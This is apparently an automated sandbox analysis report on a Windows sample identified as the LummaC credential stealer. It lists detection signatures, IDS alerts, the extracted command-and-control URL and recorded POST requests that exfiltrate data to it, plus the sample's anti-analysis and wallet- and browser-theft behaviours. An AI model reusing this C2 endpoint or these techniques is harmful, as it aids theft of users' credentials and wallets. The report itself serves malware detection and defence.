Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561463
MD5:44eb876d74e66bc5879d4ac1b636eaf1
SHA1:614cc57507b70108e366e88e296db7c9c10f029e
SHA256:e8030c08981ae2cccfda22cbfd18ede9d1e1e51495ece00ccae6f8ebcad1c6f0
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44EB876D74E66BC5879D4AC1B636EAF1)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 4392JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 4392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 4392JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T13:57:33.993626+010020283713Unknown Traffic192.168.2.649707104.21.33.116443TCP
          2024-11-23T13:57:35.979561+010020283713Unknown Traffic192.168.2.649708104.21.33.116443TCP
          2024-11-23T13:57:38.191607+010020283713Unknown Traffic192.168.2.649710104.21.33.116443TCP
          2024-11-23T13:57:40.446583+010020283713Unknown Traffic192.168.2.649712104.21.33.116443TCP
          2024-11-23T13:57:42.848399+010020283713Unknown Traffic192.168.2.649713104.21.33.116443TCP
          2024-11-23T13:57:45.639772+010020283713Unknown Traffic192.168.2.649720104.21.33.116443TCP
          2024-11-23T13:57:48.020217+010020283713Unknown Traffic192.168.2.649729104.21.33.116443TCP
          2024-11-23T13:57:52.147862+010020283713Unknown Traffic192.168.2.649745104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T13:57:34.672720+010020546531A Network Trojan was detected192.168.2.649707104.21.33.116443TCP
          2024-11-23T13:57:36.672012+010020546531A Network Trojan was detected192.168.2.649708104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T13:57:34.672720+010020498361A Network Trojan was detected192.168.2.649707104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T13:57:36.672012+010020498121A Network Trojan was detected192.168.2.649708104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T13:57:46.236579+010020480941Malware Command and Control Activity Detected192.168.2.649720104.21.33.116443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Found malware configuration
          Source: file.exe.4392.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 44%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49729 version: TLS 1.2

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49720 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49708 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 104.21.33.116:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://property-imper.sbs/api
          Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.33.116:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8YZHJO8XC3MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D5KV57W0M5CLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WO1UNFDP146E3AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19945Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=30X3QL46User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1170Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M6P2U4PWMUOPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571390Host: property-imper.sbs
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
          Source: file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/4m
          Source: file.exe, file.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
          Source: file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api$#
          Source: file.exe, 00000000.00000003.2283650767.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284187170.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiH#
          Source: file.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiZf
          Source: file.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apis#N
          Source: file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/lmy
          Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
          Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api.default-release/key4.dbPK
          Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiK
          Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
          Source: file.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
          Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
          Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49729 version: TLS 1.2

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993084016393443
          Source: file.exeStatic PE information: Section: prornizb ZLIB complexity 0.9944696162046909
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.2194861295.0000000005590000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173096174.000000000558D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172735182.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194757528.000000000559A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
